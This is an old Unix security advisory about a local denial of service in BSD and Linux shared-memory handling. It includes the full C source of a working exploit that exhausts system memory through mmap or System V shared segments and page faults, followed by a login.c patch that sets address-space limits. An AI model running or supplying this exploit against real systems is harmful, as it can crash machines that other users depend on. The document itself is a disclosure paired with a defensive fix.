COMMAND
Shared memory (IPC)
SYSTEMS AFFECTED
Most BSD kernels
PROBLEM
Mike Perry posted following. While fiddling with various IPC
mechanisms and reading The Design and Implementation of 4.4BSD, a
few things can struch reader as potentially dangerous. According
to the book, when you request a shared memory segment via mmap(),
the file isn't actually physically in memory until you start to
trigger page faults and cause the vnode-pager to page in the data
from the file. Then, the following passage from shmctl(2) under
Linux caught my eye: "The user must ensure that a segment is
eventually destroyed; otherwise its pages that were faulted in
will remain in memory or swap."
So as it turns out that it is in fact possible to create a DoS
condition by requesting a truckload of shared mem, then triggering
pagefaults in the entire shared region. Now the end result is no
different than a simple fork or malloc bomb, but it is
considerably harder to prevent on most systems. This is mainly
because:
1. The system does not check rlimits for mmap and shmget
(FreeBSD)
2. The system never bothers to offer the ability to set the
rlimits for virtual memory via shells, login process, or
otherwise. (Linux)
3. b. The system does not actually allocate shared memory
until a page fault is triggered (this could be argued to
be a feature - Linux, *BSD)
a. The system does not watch to make sure you don't share
more memory than exists. (Linux, Irix, BSD?)
4. With System V IPC, shared memory persists even after the
process is gone. So even though the kernel may kill the
process after it exhausts all memory from page faults,
there still is 0 memory left for the system. (suppose
with some trickery you might be able to achieve the same
results by shared mmap()'ing a few large files between
pairs of processes) (All)
Mike attached a program that will exploit these conditions using
either shmget(), mmap(), or by getting malloc to mmap() (those are
in order of effectivness). This program should compile on any
architecture. SGI Irix is not vulnerable. Reading The Design
and Implementation of 4.4BSD, it sounds as if the BSDs should all
be vulnerable. FreeBSD will mmap as much memory as you tell it.
The default attack is __FUXX0R_MMAP__. Mike posted the wrong
file. He meant to post one that had the default attack of
__FUXX0R_SYSV__, and with __REALLY_FUXX0R__ undefined (so the
prog wouldn't actually page fault and kill your system, if you
just wanted to see if limits would kick in). Please change these
before running the exploit. System V IPC is where the real kernel
crusher is.
It seems that OpenBSD 2.5-current (Jul 3) is vulnerable. The
place to check if you're vulnerable is sys/resource.h, or if
you're BSD and have kernel source, checking sys/vm/vm_mmap.c for
RLIMIT other than STACK should let you know. The proper way to
fix this is to have a seperate limit for address space or virtual
memory. Solaris has both (probably since their malloc uses both
brk and mmap, and the virtual memory limit is for stopping malloc
bombs).
/*
* This program can be used to exploit DoS bugs in the VM systems or utility
* sets of certain OS's.
*
* Common problems:
* 1. The system does not check rlimits for mmap and shmget (FreeBSD)
* 2. The system never bothers to offer the ability to set the rlimits for
* virtual memory via shells, login process, or otherwise. (Linux)
* 3. b. The system does not actually allocate shared memory until a page fault
* is triggered (this could be argued to be a feature - Linux, *BSD)
* a. The system does not watch to make sure you don't share more memory
* than exists. (Linux, Irix, BSD?)
* 4. With System V IPC, shared memory persists even after the process is
* gone. So even though the kernel may kill the process after it exhausts all
* memory from page faults, there still is 0 memory left for the system.
* (All)
*
* This program should compile on any architecture. SGI Irix is not
* vulnerable. From reading The Design and Implementation of 4.4BSD it sounds
* as if the BSDs should all be vulnerable. FreeBSD will mmap as much memory
* as you tell it. I haven't tried page faulting the memory, as the system is
* not mine. I'd be very interested to hear about OpenBSD...
*
* This program is provided for vulnerability evaluation ONLY. DoS's aren't
* cool, funny, or anything else. Don't use this on a machine that isn't
* yours!!!
*/
#include <stdio.h>
#include <errno.h>
#include <sys/ipc.h>
#include <sys/shm.h> /* redefinition of LBA.. PAGE_SIZE in both cases.. */
#ifdef __linux__
#include <asm/shmparam.h>
#include <asm/page.h>
#endif
#include <sys/types.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/fcntl.h>
#include <sys/mman.h>
int len;
#define __FUXX0R_MMAP__
/* mmap also implements the copy-on-fault mechanism, but because the only way
* to easily exploit this is to use anonymous mappings, once the kernel kills
* the offending process, you can recover. (Although swap death may still
* occurr */
/* #define __FUXX0R_MMAP__ */
/* Most mallocs use mmap to allocate large regions of memory. */
/* #define __FUXX0R_MMAP_MALLOC__ */
/* Guess what this option does :) */
#define __REALLY_FUXX0R__
/* From glibc 2.1.1 malloc/malloc.c */
#define DEFAULT_MMAP_THRESHOLD (128 * 1024)
#ifndef PAGE_SIZE
# define PAGE_SIZE 4096
#endif
#ifndef SHMSEG
# define SHMSEG 256
#endif
#if defined(__FUXX0R_MMAP_MALLOC__)
void *mymalloc(int n)
{
if(n <= DEFAULT_MMAP_THRESHOLD)
n = DEFAULT_MMAP_THRESHOLD + 1;
return malloc(n);
}
void myfree(void *buf)
{
free(buf);
}
#elif defined(__FUXX0R_MMAP__)
void *mymalloc(int n)
{
int fd;
void *ret;
fd = open("/dev/zero", O_RDWR);
ret = mmap(0, n, PROT_READ|PROT_WRITE, MAP_PRIVATE, fd, 0);
close(fd);
return (ret == (void *)-1 ? NULL : ret);
}
void myfree(void *buf)
{
munmap(buf, len);
}
#elif defined(__FUXX0R_SYSV__)
void *mymalloc(int n)
{
char *buf;
static int i = 0;
int shmid;
i++; /* 0 is IPC_PRIVATE */
if((shmid = shmget(i, n, IPC_CREAT | SHM_R | SHM_W)) == -1)
{
#if defined(__irix__)
if (shmctl (shmid, IPC_RMID, NULL))
{
perror("shmctl");
}
#endif
return NULL;
}
if((buf = shmat(shmid, 0, 0)) == (char *)-1)
{
#if defined(__irix__)
if (shmctl (shmid, IPC_RMID, NULL))
{
perror("shmctl");
}
#endif
return NULL;
}
#ifndef __REALLY_FUXX0R__
if (shmctl (shmid, IPC_RMID, NULL))
{
perror("shmctl");
}
#endif
return buf;
}
void myfree(void *buf)
{
shmdt(buf);
}
#endif
#ifdef __linux__
void cleanSysV()
{
struct shmid_ds shmid;
struct shm_info shm_info;
int id;
int maxid;
int ret;
int shid;
maxid = shmctl (0, SHM_INFO, (struct shmid_ds *) &shm_info);
printf("maxid %d\n", maxid);
for (id = 0; id <= maxid; id++)
{
if((shid = shmctl (id, SHM_STAT, &shmid)) < 0)
continue;
if (shmctl (shid, IPC_RMID, NULL))
{
perror("shmctl");
}
printf("id %d has %d attachments\n", shid, shmid.shm_nattch);
shmid.shm_nattch = 0;
shmctl(shid, IPC_SET, &shmid);
if(shmctl(shid, SHM_STAT, &shmid) < 0)
{
printf("id %d deleted sucessfully\n", shid);
}
else if(shmid.shm_nattch == 0)
{
printf("Still able to stat id %d, but has no attachments\n", shid);
}
else
{
printf("Error, failed to remove id %d!\n", shid);
}
}
}
#endif
int main(int argc, char **argv)
{
int shmid;
int i = 0;
char *buf[SHMSEG * 2];
int max;
int offset;
if(argc < 2)
{
printf("Usage: %s <[0x]size of segments>\n", argv[0]);
#ifdef __linux__
printf(" or %s --clean (destroys all of IPC space you have permissions to)\n", argv[0]);
#endif
exit(0);
}
#ifdef __linux__
if(!strcmp(argv[1], "--clean"))
{
cleanSysV();
exit(0);
}
#endif
len = strtol(argv[1], NULL, 0);
for(buf[i] = mymalloc(len); i < SHMSEG * 2 && buf[i] != NULL; buf[++i] = mymalloc(len))
;
max = i;
perror("Stopped because");
printf("Maxed out at %d %d byte segments\n", max, len);
#if defined(__FUXX0R_SYSV__) && defined(SHMMNI)
printf("Despite an alleged max of %d (%d per proc) %d byte segs. (Page "
"size: %d), \n", SHMMNI, SHMSEG, SHMMAX, PAGE_SIZE);
#endif
#ifdef __REALLY_FUXX0R__
fprintf(stderr, "Page faulting alloced region... Have a nice life!\n");
for(i = 0; i < max; i++)
{
for(offset = 0; offset < len; offset += PAGE_SIZE)
{
buf[i][offset] = '*';
}
printf("wrote to %d byes of memory, final offset %d\n", len, offset);
}
// never reached :(
#else
for(i = 0; i <= max; i++)
{
myfree(buf[i]);
}
#endif
exit(42);
}
For people who have using small segments to map and caused the
program to segfault, this is because the default attack is mmap,
and you can do an infinite number of private mmapings. Use an
array of pointers to keep track of the memory to free it when the
__REALLY_FUXX0R__ option isn't set. So you overrun your own
buffer. The buffer size is 2 times the limit for SysV IPC shares
for processes, so the buffer will not be overrun with that attack.
SOLUTION
Below is a patch to util-linux-2.9o login.c (and pathnames.h) that
provides a means under Linux (should be pretty portable to other
OS's) to set limits for the address space limit (RLIMIT_AS: the
rlimit that controls how much data you can actually map into
your process). The patch is based on an old program called
lshell that set limits by wrapping your shell. Sample
/etc/limits file:
# Limit the user guest to 5 minutes CPU time and 8 procs, 5Mb address space guest C5P8V5D2
# 60 min's CPU time, 30 procs, 15Mb data, 50 megs total address space, 5 megs
# stack, 15 megs of RSS.
default C60P30D15V50S5R15
At the very least, it is recommended default V<size of physical
memory>. You can use lowercase letters for the next lowest order
of magnitude of units. The comment in the patch explains it in
further detail. Note even in this case, a determined user can
probably just login a dozen or so times and use SysV IPC to steal
the system memory.
diff -ur ./util-linux-2.9o/lib/pathnames.h ./util-linux-2.9o-mp/lib/pathnames.h
--- ./util-linux-2.9o/lib/pathnames.h Sun Oct 11 14:19:16 1998
+++ ./util-linux-2.9o-mp/lib/pathnames.h Wed Jul 14 22:51:13 1999
@@ -86,6 +86,7 @@
#define _PATH_SECURE "/etc/securesingle"
#define _PATH_USERTTY "/etc/usertty"
+#define _PATH_LIMITS "/etc/limits"
#define _PATH_MTAB "/etc/mtab"
#define _PATH_UMOUNT "/bin/umount"
diff -ur ./util-linux-2.9o/login-utils/login.c ./util-linux-2.9o-mp/login-utils/login.c
--- ./util-linux-2.9o/login-utils/login.c Sat Mar 20 14:20:16 1999
+++ ./util-linux-2.9o-mp/login-utils/login.c Wed Jul 14 22:49:24 1999
@@ -185,6 +185,7 @@
char *stypeof P_((char *ttyid));
void checktty P_((char *user, char *tty, struct passwd *pwd));
void sleepexit P_((int eval));
+void setup_limits P_(struct passwd *pwd);
#ifdef CRYPTOCARD
int cryptocard P_((void));
#endif
@@ -1110,6 +1111,8 @@
childArgv[childArgc++] = NULL;
+ setup_limits(pwd);
+
execvp(childArgv[0], childArgv + 1);
if (!strcmp(childArgv[0], "/bin/sh"))
@@ -1120,6 +1123,161 @@
exit(0);
}
+
+/* Most of this code ripped from lshell by Joel Katz */
+void process(char *buf)
+{
+ /* buf is of the form [Fn][Pn][Ct][Vm][Sm][Rm][Lm][Dm] where */
+ /* F specifies n max open files */
+ /* P specifies n max procs */
+ /* c specifies t seconds of cpu */
+ /* C specifies t minutes of cpu */
+ /* v specifies m kbs of total virtual memory (address space) */
+ /* V specifies m megs of total virtual memory (address space) */
+ /* s specifies m kbs of stack */
+ /* S specifies m megs of stack */
+ /* r specifies m kbs of RSS */
+ /* R specifies m megs of RSS */
+ /* l specifies m kbs of locked (non-swappable) memory */
+ /* L specifies m megs of locked (non-swappable) memory */
+ /* d specifies m kbs of Data segment */
+ /* D specifies m megs of Data segment */
+
+ struct rlimit rlim;
+ char *pp = buf;
+ int i;
+
+ while(*pp!=0)
+ {
+ i = 1;
+ switch(*pp++)
+ {
+ case 'f':
+ case 'F':
+ i = atoi(pp);
+ if(!i)
+ break;
+ rlim.rlim_cur = i;
+ rlim.rlim_max = i;
+ setrlimit(RLIMIT_NOFILE, &rlim);
+ break;
+ case 'p':
+ case 'P':
+ i = atoi(pp);
+ if(!i)
+ break;
+ rlim.rlim_cur = i;
+ rlim.rlim_max = i;
+ setrlimit(RLIMIT_NPROC, &rlim);
+ break;
+ case 'C':
+ i = 60;
+ case 'c':
+ i *= atoi(pp);
+ if(!i)
+ break;
+ rlim.rlim_cur = i;
+ rlim.rlim_max = i;
+ setrlimit(RLIMIT_CPU, &rlim);
+ break;
+ case 'V':
+ i = 1024;
+ case 'v':
+ i *= atoi(pp)*1024;
+ if(!i)
+ break;
+ rlim.rlim_cur = i;
+ rlim.rlim_max = i;
+#if defined(RLIMIT_AS) /* Linux */
+ setrlimit(RLIMIT_AS, &rlim);
+#else if defined(RLIMIT_VMEM) /* Irix */
+ setrlimit(RLIMIT_VMEM, &rlim);
+#endif
+ break;
+ case 'S':
+ i = 1024;
+ case 's':
+ i *= atoi(pp)*1024;
+ if(!i)
+ break;
+ rlim.rlim_cur = i;
+ rlim.rlim_max = i;
+ setrlimit(RLIMIT_STACK, &rlim);
+ break;
+ case 'R':
+ i = 1024;
+ case 'r':
+ i *= atoi(pp)*1024;
+ if(!i)
+ break;
+ rlim.rlim_cur = i;
+ rlim.rlim_max = i;
+ setrlimit(RLIMIT_RSS, &rlim);
+ break;
+ case 'L':
+ i = 1024;
+ case 'l':
+ i *= atoi(pp)*1024;
+ if(!i)
+ break;
+ rlim.rlim_cur = i;
+ rlim.rlim_max = i;
+ setrlimit(RLIMIT_MEMLOCK, &rlim);
+ break;
+ case 'D':
+ i = 1024;
+ case 'd':
+ i *= atoi(pp)*1024;
+ if(!i)
+ break;
+ rlim.rlim_cur = i;
+ rlim.rlim_max = i;
+ setrlimit(RLIMIT_DATA, &rlim);
+ break;
+ }
+ }
+}
+
+void setup_limits(struct passwd *pw)
+{
+ FILE *fp;
+ int i;
+ char buf[200], name[20], limits[64];
+ char *p;
+
+ if(pw->pw_uid == 0)
+ {
+ return;
+ }
+
+ if((fp = fopen(_PATH_LIMITS,"r")) == NULL)
+ {
+ return;
+ }
+
+ while(fgets(buf, 200, fp) != NULL)
+ {
+ if(buf[0] == '#')
+ continue;
+
+ p = strchr(buf, '#');
+ if(p)
+ *p = 0;
+
+ i=sscanf(buf, "%s %s", name, limits);
+
+ if(!strcmp(name, pw->pw_name))
+ {
+ if(i==2)
+ process(limits);
+ fclose(fp);
+ return;
+ }
+ }
+ fclose(fp);
+ process(limits); /* Last line is default */
+}
+
void
getloginname()
SysVinit (>2.54) uses /etc/initscript (or /sbin/initscript) to
spawn the processes listed in /etc/inittab, so you can set limits
within that (e.g. for the getty processes). Either wrap
in.telnetd or use -L to wrap the login program. Set limits in
the rc.init2 (etc) script for daemons which may execute
user-defined code (e.g. crond, httpd). Similarly for xdm via
Xstartup. You might also want to wrap your MDAs if you are using
procmail or allow program aliases in ~/.forward files.
You have to use pam, or Sys V init, or patch. Lshell does not set
the RLIMIT_AS limit either, you have to apply patch to it. After
more research, it seems that System V implements RLIMIT_VMEM to
stop people from exploiting this problem, but apparently when BSD
implemented the Sys V IPC, they neglected to add an appropriate
RLIMIT.